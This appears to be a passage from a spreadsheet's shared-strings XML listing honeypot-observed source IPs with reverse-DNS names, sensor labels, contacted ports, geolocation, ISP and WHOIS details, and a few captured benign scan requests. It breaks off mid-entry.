  <si>
    <t>59.93.190.104</t>
  </si>
  <si>
    <t>::ffff:3b5d:be68</t>
  </si>
  <si>
    <t>55c5ce1e66a787b12cf7030341ce50a3</t>
  </si>
  <si>
    <t>117.251.184.148</t>
  </si>
  <si>
    <t>::ffff:75fb:b894</t>
  </si>
  <si>
    <t>3c0a9760a9ca61381572af6a093baa35</t>
  </si>
  <si>
    <t>113.193.88.1</t>
  </si>
  <si>
    <t>::ffff:71c1:5801</t>
  </si>
  <si>
    <t>3c7e5e406d3b0237a93e3453309b4241</t>
  </si>
  <si>
    <t>117.207.164.96</t>
  </si>
  <si>
    <t>::ffff:75cf:a460</t>
  </si>
  <si>
    <t>337b58782509ef6beddbecc74e9dcfa8</t>
  </si>
  <si>
    <t>114.33.56.39</t>
  </si>
  <si>
    <t>114-33-56-39.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>23&amp;&amp;7916&amp;&amp;39572&amp;&amp;39585&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:7221:3827</t>
  </si>
  <si>
    <t>6d9a4ce5f5275aef439c09370ccca8f2</t>
  </si>
  <si>
    <t>114.35.42.2</t>
  </si>
  <si>
    <t>114-35-42-2.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H39&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H12</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;5853&amp;&amp;80&amp;&amp;23&amp;&amp;43974&amp;&amp;43988&amp;&amp;43998&amp;&amp;44021&amp;&amp;44030&amp;&amp;44043&amp;&amp;44057&amp;&amp;44074&amp;&amp;44091&amp;&amp;NA&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:7223:2a02</t>
  </si>
  <si>
    <t>835e6d432a813ae2fd74bccbacf2ab6f</t>
  </si>
  <si>
    <t>114.33.213.86</t>
  </si>
  <si>
    <t>114-33-213-86.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H28&amp;&amp;SMA-LAB_MT-CPA_H42&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H27</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;44343&amp;&amp;23&amp;&amp;80&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:7221:d556</t>
  </si>
  <si>
    <t>b2749119b96db2fff73e7d5624315c9a</t>
  </si>
  <si>
    <t>117.206.206.8</t>
  </si>
  <si>
    <t>::ffff:75ce:ce08</t>
  </si>
  <si>
    <t>c44459539c998c3efe3413b72a180862</t>
  </si>
  <si>
    <t>117.209.25.246</t>
  </si>
  <si>
    <t>::ffff:75d1:19f6</t>
  </si>
  <si>
    <t>06a8a1f92625590e59f1abecc5c317be</t>
  </si>
  <si>
    <t>45.134.212.73</t>
  </si>
  <si>
    <t>Cdnext WAR</t>
  </si>
  <si>
    <t>2019-07-29</t>
  </si>
  <si>
    <t>::ffff:2d86:d449</t>
  </si>
  <si>
    <t>32a4621db963e4b5891bc8d2eb11a95f</t>
  </si>
  <si>
    <t>118.141.224.2</t>
  </si>
  <si>
    <t>::ffff:768d:e002</t>
  </si>
  <si>
    <t>13d5cb98b4b98dbefc99aba2bf130e9a</t>
  </si>
  <si>
    <t>89.160.198.223</t>
  </si>
  <si>
    <t>89-160-198-223.du.xdsl.is&amp;&amp;NA</t>
  </si>
  <si>
    <t>23&amp;&amp;62198&amp;&amp;41334&amp;&amp;41426&amp;&amp;41350&amp;&amp;41328&amp;&amp;44037&amp;&amp;NA</t>
  </si>
  <si>
    <t>IS</t>
  </si>
  <si>
    <t>Iceland</t>
  </si>
  <si>
    <t>1</t>
  </si>
  <si>
    <t>Reykjavíkurborg</t>
  </si>
  <si>
    <t>Reykjavik (Háaleiti)</t>
  </si>
  <si>
    <t>3413829</t>
  </si>
  <si>
    <t>104</t>
  </si>
  <si>
    <t>64.1401</t>
  </si>
  <si>
    <t>-21.8485</t>
  </si>
  <si>
    <t>12969</t>
  </si>
  <si>
    <t>Ljosleidarinn ehf</t>
  </si>
  <si>
    <t>Vodafone Iceland (ex. Lina.Net)</t>
  </si>
  <si>
    <t>::ffff:59a0:c6df</t>
  </si>
  <si>
    <t>4ecfe7ead5ec42131e468fa138901821</t>
  </si>
  <si>
    <t>117.217.14.91</t>
  </si>
  <si>
    <t>Jalgaon</t>
  </si>
  <si>
    <t>1269407</t>
  </si>
  <si>
    <t>425001</t>
  </si>
  <si>
    <t>21.0077</t>
  </si>
  <si>
    <t>75.5626</t>
  </si>
  <si>
    <t>::ffff:75d9:e5b</t>
  </si>
  <si>
    <t>2c59802f667d1d0c2d846cd025bacaab</t>
  </si>
  <si>
    <t>36.233.221.104</t>
  </si>
  <si>
    <t>::ffff:24e9:dd68</t>
  </si>
  <si>
    <t>3164d10e12318bc48b46c9f8d2cae5ab</t>
  </si>
  <si>
    <t>175.156.211.106</t>
  </si>
  <si>
    <t>Singapore (Jurong East)</t>
  </si>
  <si>
    <t>609606</t>
  </si>
  <si>
    <t>1.32525</t>
  </si>
  <si>
    <t>103.749</t>
  </si>
  <si>
    <t>4773</t>
  </si>
  <si>
    <t>M1 LIMITED</t>
  </si>
  <si>
    <t>M1 Ltd</t>
  </si>
  <si>
    <t>2010-01-12</t>
  </si>
  <si>
    <t>M1Net</t>
  </si>
  <si>
    <t>::ffff:af9c:d36a</t>
  </si>
  <si>
    <t>eb06f59fe58a9a710c353bf4be57adb3</t>
  </si>
  <si>
    <t>46.119.184.137</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H12&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H47</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;45521&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:2e77:b889</t>
  </si>
  <si>
    <t>291563abe4b520bc2aaf22904fd9bca8</t>
  </si>
  <si>
    <t>45.231.60.170</t>
  </si>
  <si>
    <t>João Pessoa</t>
  </si>
  <si>
    <t>3397277</t>
  </si>
  <si>
    <t>-7.115</t>
  </si>
  <si>
    <t>-34.8631</t>
  </si>
  <si>
    <t>267233</t>
  </si>
  <si>
    <t>Set Sistemas de Seg. Elet. e Telecomunicações</t>
  </si>
  <si>
    <t>::ffff:2de7:3caa</t>
  </si>
  <si>
    <t>98ab6fe14a05aef99b218aa83ffa4d00</t>
  </si>
  <si>
    <t>117.240.255.79</t>
  </si>
  <si>
    <t>::ffff:75f0:ff4f</t>
  </si>
  <si>
    <t>45a24018bd4e469456f9065f0babe3a2</t>
  </si>
  <si>
    <t>114.43.25.253</t>
  </si>
  <si>
    <t>114-43-25-253.dynamic-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>23&amp;&amp;48524&amp;&amp;NA&amp;&amp;42464</t>
  </si>
  <si>
    <t>::ffff:722b:19fd</t>
  </si>
  <si>
    <t>863a1be99b1b84346084e39b69eaf84d</t>
  </si>
  <si>
    <t>32.217.51.132</t>
  </si>
  <si>
    <t>NA&amp;&amp;32-217-51-132.bng02.wtrb.ct.frontiernet.net</t>
  </si>
  <si>
    <t>Trumbull</t>
  </si>
  <si>
    <t>4844459</t>
  </si>
  <si>
    <t>06611</t>
  </si>
  <si>
    <t>41.2429</t>
  </si>
  <si>
    <t>-73.2007</t>
  </si>
  <si>
    <t>46690</t>
  </si>
  <si>
    <t>Southern New England Telephone Company and SNET America, Inc.</t>
  </si>
  <si>
    <t>LDSL-D Frontier Communications Wallingford - CT</t>
  </si>
  <si>
    <t>1990-05-30</t>
  </si>
  <si>
    <t>SNET-AMERICA</t>
  </si>
  <si>
    <t>2015-02-11</t>
  </si>
  <si>
    <t>::ffff:20d9:3384</t>
  </si>
  <si>
    <t>00cf9f10806adc8deb4a1ccfb7ef45b9</t>
  </si>
  <si>
    <t>120.61.251.74</t>
  </si>
  <si>
    <t>::ffff:783d:fb4a</t>
  </si>
  <si>
    <t>d958ae8ebe1c71c376140fe7373fe1ac</t>
  </si>
  <si>
    <t>117.251.175.13</t>
  </si>
  <si>
    <t>::ffff:75fb:af0d</t>
  </si>
  <si>
    <t>6df13cce01be8af8d753b0d66f78dc11</t>
  </si>
  <si>
    <t>37.115.148.204</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H19</t>
  </si>
  <si>
    <t>::ffff:2573:94cc</t>
  </si>
  <si>
    <t>4def4b1a8bd76d7e2632206c971218a3</t>
  </si>
  <si>
    <t>219.85.92.104</t>
  </si>
  <si>
    <t>18182</t>
  </si>
  <si>
    <t>SONET-TW</t>
  </si>
  <si>
    <t>Sony Network Taiwan Limited</t>
  </si>
  <si>
    <t>Sonet</t>
  </si>
  <si>
    <t>::ffff:db55:5c68</t>
  </si>
  <si>
    <t>4aca1919cbd41dc1401ca17c97e514e7</t>
  </si>
  <si>
    <t>162.245.206.242</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_HTTPS_HC1</t>
  </si>
  <si>
    <t>1433&amp;&amp;8443</t>
  </si>
  <si>
    <t>El Segundo</t>
  </si>
  <si>
    <t>5345860</t>
  </si>
  <si>
    <t>90245</t>
  </si>
  <si>
    <t>33.919200000000004</t>
  </si>
  <si>
    <t>-118.416</t>
  </si>
  <si>
    <t>49544</t>
  </si>
  <si>
    <t>i3D.net B.V</t>
  </si>
  <si>
    <t>i3Dnet dedicatedservers uslax1</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_HTTPS:{'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': 'www', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:a2f5:cef2</t>
  </si>
  <si>
    <t>85031cda5a9d54ae33aaf7e07b678585</t>
  </si>
  <si>
    <t>189.239.130.223</t>
  </si>
  <si>
    <t>Benito Juárez  Borough</t>
  </si>
  <si>
    <t>Benito Juarez</t>
  </si>
  <si>
    <t>3827406</t>
  </si>
  <si>
    <t>19.3984</t>
  </si>
  <si>
    <t>-99.1577</t>
  </si>
  <si>
    <t>::ffff:bdef:82df</t>
  </si>
  <si>
    <t>d1ccc4de6ca2fa3b2bc731e7c99c2546</t>
  </si>
  <si>
    <t>218.166.209.52</t>
  </si>
  <si>
    <t>218-166-209-52.dynamic-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>2002-10-09</t>
  </si>
  <si>
    <t>::ffff:daa6:d134</t>
  </si>
  <si>
    <t>87d69120ca24841587acc14954935ad0</t>
  </si>
  <si>
    <t>37.19.221.150</t>
  </si>
  <si>
    <t>Harris</t>
  </si>
  <si>
    <t>Houston</t>
  </si>
  <si>
    <t>4699066</t>
  </si>
  <si>
    <t>77052</t>
  </si>
  <si>
    <t>29.7604</t>
  </si>
  <si>
    <t>-95.3698</t>
  </si>
  <si>
    <t>Cdnext HOU</t>
  </si>
  <si>
    <t>::ffff:2513:dd96</t>
  </si>
  <si>
    <t>5af6af8d1e9bd60f2b6a4cd09a0cdfef</t>
  </si>
  <si>
    <t>59.92.172.71</t>
  </si>
  <si>
    <t>::ffff:3b5c:ac47</t>
  </si>
  <si>
    <t>aa6dbf847d513793efa6ee08852e8656</t>
  </si>
  <si>
    <t>117.251.186.135</t>
  </si>
  <si>
    <t>::ffff:75fb:ba87</t>
  </si>
  <si>
    <t>a34f1e9b5ab93519c591466cf925e3bd</t>
  </si>
  <si>
    <t>66.248.243.39</t>
  </si>
  <si>
    <t>Seattle (Queen Anne)</t>
  </si>
  <si>
    <t>98121</t>
  </si>
  <si>
    <t>47.6183</t>
  </si>
  <si>
    <t>-122.358</t>
  </si>
  <si>
    <t>21743</t>
  </si>
  <si>
    <t>Atlas Networks Corporation</t>
  </si>
  <si>
    <t>SolaDrive</t>
  </si>
  <si>
    <t>2019-12-19</t>
  </si>
  <si>
    <t>ATLAS-45-ARIN</t>
  </si>
  <si>
    <t>2022-05-31</t>
  </si>
  <si>
    <t>::ffff:42f8:f327</t>
  </si>
  <si>
    <t>2656aaf4bd39ae0e42622ab0f3196753</t>
  </si>
  <si>
    <t>178.95.158.129</t>
  </si>
  <si>
    <t>NA&amp;&amp;129-158-95-178.pool.ukrtel.net</t>
  </si>
  <si>
    <t>Kyiv (Shevchenkivs'kyi district)</t>
  </si>
  <si>
    <t>50.4443</t>
  </si>
  <si>
    <t>30.5108</t>
  </si>
  <si>
    <t>6849</t>
  </si>
  <si>
    <t>PJSC Ukrtelecom</t>
  </si>
  <si>
    <t>UKRTELECOM</t>
  </si>
  <si>
    <t>JSC Ukrtelecom</t>
  </si>
  <si>
    <t>2009-12-15</t>
  </si>
  <si>
    <t>1997-01-11 05:00:00</t>
  </si>
  <si>
    <t>2026-01-10 05:00:00</t>
  </si>
  <si>
    <t>2024-12-03 08:56:02</t>
  </si>
  <si>
    <t>['EXPERT-DP.UKRTEL.NET', 'EXPERT.UKRTEL.NET', 'NS1-01.AZURE-DNS.COM', 'NS2-01.AZURE-DNS.NET', 'NS3-01.AZURE-DNS.ORG', 'NS4-01.AZURE-DNS.INFO']</t>
  </si>
  <si>
    <t>Internet Invest, Ltd. dba Imena.ua</t>
  </si>
  <si>
    <t>abuse@imena.ua</t>
  </si>
  <si>
    <t>::ffff:b25f:9e81</t>
  </si>
  <si>
    <t>09abc3e12d120756e75562169df50849</t>
  </si>
  <si>
    <t>117.242.232.43</t>
  </si>
  <si>
    <t>::ffff:75f2:e82b</t>
  </si>
  <si>
    <t>0a7ed75288b478006a9436b8d9c97ae3</t>
  </si>
  <si>
    <t>117.217.81.120</t>
  </si>
  <si>
    <t>::ffff:75d9:5178</t>
  </si>
  <si>
    <t>184913834e5010928b3a164dc4d4dbbb</t>
  </si>
  <si>
    <t>59.93.50.157</t>
  </si>
  <si>
    <t>::ffff:3b5d:329d</t>
  </si>
  <si>
    <t>4a7076883cefc6908cb21acd0d2661c4</t>
  </si>
  <si>
    <t>117.251.174.201</t>
  </si>
  <si>
    <t>::ffff:75fb:aec9</t>
  </si>
  <si>
    <t>1bb44c9ed70bbc61c643507b3b3c2a55</t>
  </si>
  <si>
    <t>125.137.73.250</t>
  </si>
  <si>
    <t>700112</t>
  </si>
  <si>
    <t>Daegusicheong</t>
  </si>
  <si>
    <t>2005-08-23</t>
  </si>
  <si>
    <t>::ffff:7d89:49fa</t>
  </si>
  <si>
    <t>9c6725a5e690abd534792d771f3c7bc5</t>
  </si>
  <si>
    <t>110.235.57.84</t>
  </si>
  <si>
    <t>110235057084.ctinets.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>2009-05-15</t>
  </si>
  <si>
    <t>HKBN-HK</t>
  </si>
  <si>
    <t>::ffff:6eeb:3954</t>
  </si>
  <si>
    <t>c7d8f32b22bda62f19ee7b4c40610c20</t>
  </si>
  <si>
    <t>59.98.202.240</t>
  </si>
  <si>
    <t>::ffff:3b62:caf0</t>
  </si>
  <si>
    <t>d5b7618eaaceaa46c55824a6601b4fed</t>
  </si>
  <si>
    <t>13.218.198.5</t>
  </si>
  <si>
    <t>ec2-13-218-198-5.compute-1.amazonaws.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:dda:c605</t>
  </si>
  <si>
    <t>546a9c3e900ff24848c14f2ce6d4e29d</t>
  </si>
  <si>
    <t>117.219.89.47</t>
  </si>
  <si>
    <t>::ffff:75db:592f</t>
  </si>
  <si>
    <t>6cca2ad1fac025ce4b10c23b8ded66db</t>
  </si>
  <si>
    <t>210.165.64.108</t>
  </si>
  <si>
    <t>pl12140.ag1313.nttpc.ne.jp</t>
  </si>
  <si>
    <t>Fukui</t>
  </si>
  <si>
    <t>Echizen</t>
  </si>
  <si>
    <t>11612457</t>
  </si>
  <si>
    <t>35.8857</t>
  </si>
  <si>
    <t>136.171</t>
  </si>
  <si>
    <t>INFOSPHERE NTT PC Communications, Inc.</t>
  </si>
  <si>
    <t>::ffff:d2a5:406c</t>
  </si>
  <si>
    <t>25691e6b5345bf9d9aec1eb6943984b9</t>
  </si>
  <si>
    <t>117.202.189.214</t>
  </si>
  <si>
    <t>::ffff:75ca:bdd6</t>
  </si>
  <si>
    <t>3be37c3fa9ee85fead2f1245ff35d774</t>
  </si>
  <si>
    <t>59.183.19.77</t>
  </si>
  <si>
    <t>::ffff:3bb7:134d</t>
  </si>
  <si>
    <t>9c7a76e71f8d90d00f5037f5a8257a19</t>
  </si>
  <si>
    <t>117.206.38.154</t>
  </si>
  <si>
    <t>::ffff:75ce:269a</t>
  </si>
  <si>
    <t>c06deaeac8b8ee13caad5d8d35fc9efa</t>
  </si>
  <si>
    <t>59.97.215.83</t>
  </si>
  <si>
    <t>::ffff:3b61:d753</t>
  </si>
  <si>
    <t>8cf1517dbe99499d09879e9d15f4e7e0</t>
  </si>
  <si>
    <t>117.232.12.46</t>
  </si>
  <si>
    <t>::ffff:75e8:c2e</t>
  </si>
  <si>
    <t>97265be250d78f7325ac8602225ce723</t>
  </si>
  <si>
    <t>203.218.139.212</t>
  </si>
  <si>
    <t>NA&amp;&amp;pcd349212.netvigator.com</t>
  </si>
  <si>
    <t>2001-01-25</t>
  </si>
  <si>
    <t>::ffff:cbda:8bd4</t>
  </si>
  <si>
    <t>a62b5761a6e6517b064c3911d70dde0b</t>
  </si>
  <si>
    <t>23.95.191.218</t>
  </si>
  <si>
    <t>SMA-LAB_RDP_H36&amp;&amp;SMA-LAB_PJL_HC1</t>
  </si>
  <si>
    <t>3389&amp;&amp;9100</t>
  </si>
  <si>
    <t>2013-08-16</t>
  </si>
  <si>
    <t>CC-16</t>
  </si>
  <si>
    <t>2024-02-02</t>
  </si>
  <si>
    <t>connection&amp;&amp;stshash</t>
  </si>
  <si>
    <t>{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=hello'}}&amp;&amp;{Data_PJL:NA}</t>
  </si>
  <si>
    <t>::ffff:175f:bfda</t>
  </si>
  <si>
    <t>d09bfc0f22ee907b8578646c366ef5cd</t>
  </si>
  <si>
    <t>152.59.96.227</t>
  </si>
  <si>
    <t>::ffff:983b:60e3</t>
  </si>
  <si>
    <t>a67761f770861a07281f3136b21fdebc</t>
  </si>
  <si>
    <t>59.180.139.95</t>
  </si>
  <si>
    <t>::ffff:3bb4:8b5f</t>
  </si>
  <si>
    <t>671586634073fbdb812ce1dea18cc210</t>
  </si>
  <si>
    <t>125.229.73.114</t>
  </si>
  <si>
    <t>NA&amp;&amp;125-229-73-114.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H28</t>
  </si>
  <si>
    <t>::ffff:7de5:4972</t>
  </si>
  <si>
    <t>84d9c61a3d07911c8dbf78df3f8ca282</t>
  </si>
  <si>
    <t>120.157.62.200</t>
  </si>
  <si>
    <t>::ffff:789d:3ec8</t>
  </si>
  <si>
    <t>a966a16d632e25d654980a3c18f2d8c1</t>
  </si>
  <si>
    <t>117.2.185.85</t>
  </si>
  <si>
    <t>SMA-LAB_SOCKS5_H47&amp;&amp;SMA-LAB_POSTGRES_HC1</t>
  </si>
  <si>
    <t>::ffff:7502:b955</t>
  </si>
  <si>
    <t>b00e1eb05dd36824be4c5b2c10fa0114</t>
  </si>
  <si>
    <t>187.230.63.51</t>
  </si>
  <si>
    <t>SON</t>
  </si>
  <si>
    <t>Sonora</t>
  </si>
  <si>
    <t>Santa Ana</t>
  </si>
  <si>
    <t>3984717</t>
  </si>
  <si>
    <t>30.5408</t>
  </si>
  <si>
    <t>-111.119</t>
  </si>
  <si>
    <t>AS8151</t>
  </si>
  <si>
    <t>Uninet</t>
  </si>
  <si>
    <t>::ffff:bbe6:3f33</t>
  </si>
  <si>
    <t>a5a1cbc7161eb2bb2c3865a004ad1fd2</t>
  </si>
  <si>
    <t>117.242.206.143</t>
  </si>
  <si>
    <t>::ffff:75f2:ce8f</t>
  </si>
  <si>
    <t>a1d6570c69d3cb7c72e247e812a545ca</t>
  </si>
  <si>
    <t>122.165.253.90</t>
  </si>
  <si>
    <t>1433&amp;&amp;50279&amp;&amp;61414</t>
  </si>
  <si>
    <t>::ffff:7aa5:fd5a</t>
  </si>
  <si>
    <t>d2d2e8206f5c6bd09df5c803df3ba3f1</t>
  </si>
  <si>
    <t>178.137.202.65</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_POSTGRES_H8&amp;&amp;SMA-LAB_SIP_H41&amp;&amp;SMA-LAB_SNMP_H15&amp;&amp;SMA-LAB_PJL_H2&amp;&amp;SMA-LAB_REDIS_H4&amp;&amp;SMA-LAB_HTTPS_H47&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_POSTGRES_H18&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_PJL_H32&amp;&amp;SMA-LAB_SMB_H41&amp;&amp;SMA-LAB_HTTPS_H24&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_ORACLE_H6&amp;&amp;SMA-LAB_IRC_H41&amp;&amp;SMA-LAB_SMTP_H29&amp;&amp;SMA-LAB_PJL_H8&amp;&amp;SMA-LAB_REDIS_H37&amp;&amp;SMA-LAB_HTTPS_H1&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H43</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;5432&amp;&amp;5060&amp;&amp;161&amp;&amp;9100&amp;&amp;6379&amp;&amp;443&amp;&amp;2562&amp;&amp;5432&amp;&amp;80&amp;&amp;23&amp;&amp;9100&amp;&amp;445&amp;&amp;443&amp;&amp;59881&amp;&amp;1521&amp;&amp;6667&amp;&amp;25&amp;&amp;9100&amp;&amp;6379&amp;&amp;443&amp;&amp;62424&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:b289:ca41</t>
  </si>
  <si>
    <t>aadae5ea76c17432006563bcd3ee30d5</t>
  </si>
  <si>
    <t>125.235.235.21</t>
  </si>
  <si>
    <t>::ffff:7deb:eb15</t>
  </si>
  <si>
    <t>57f58c580a42258373234bd567e50b29</t>
  </si>
  <si>
    <t>103.154.36.22</t>
  </si>
  <si>
    <t>Kasaragod</t>
  </si>
  <si>
    <t>Kāsaragod</t>
  </si>
  <si>
    <t>1267616</t>
  </si>
  <si>
    <t>12.4984</t>
  </si>
  <si>
    <t>74.9896</t>
  </si>
  <si>
    <t>Kerala Vision Broad Band Private Limited</t>
  </si>
  <si>
    <t>Gold Vision Kerala Cable Network Private Limited</t>
  </si>
  <si>
    <t>::ffff:679a:2416</t>
  </si>
  <si>
    <t>ddc840633df251a8fc9003b5cc5928de</t>
  </si>
  <si>
    <t>167.60.233.67</t>
  </si>
  <si>
    <t>::ffff:a73c:e943</t>
  </si>
  <si>
    <t>0b9b645c7ea2abb9d24bffc0706556cd</t>
  </si>
  <si>
    <t>183.108.114.137</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H5</t>
  </si>
  <si>
    <t>::ffff:b76c:7289</t>
  </si>
  <si>
    <t>1e30fac04b2c769d176382450a24623c</t>
  </si>
  <si>
    <t>141.224.216.196</t>
  </si>
  <si>
    <t>NA&amp;&amp;host-xj.am-w4d3-04-a.v4.dfn.nl</t>
  </si>
  <si>
    <t>23&amp;&amp;55429&amp;&amp;NA</t>
  </si>
  <si>
    <t>Schiedam Municipality</t>
  </si>
  <si>
    <t>Schiedam</t>
  </si>
  <si>
    <t>2747596</t>
  </si>
  <si>
    <t>3112</t>
  </si>
  <si>
    <t>51.9229</t>
  </si>
  <si>
    <t>4.40833</t>
  </si>
  <si>
    <t>15435</t>
  </si>
  <si>
    <t>DELTA Fiber Nederland B.V.</t>
  </si>
  <si>
    <t>DELTA Fiber Nederland</t>
  </si>
  <si>
    <t>::ffff:8de0:d8c4</t>
  </si>
  <si>
    <t>fbbbb73cfc7201629034c41641b71ba6</t>
  </si>
  <si>
    <t>49.213.180.123</t>
  </si>
  <si>
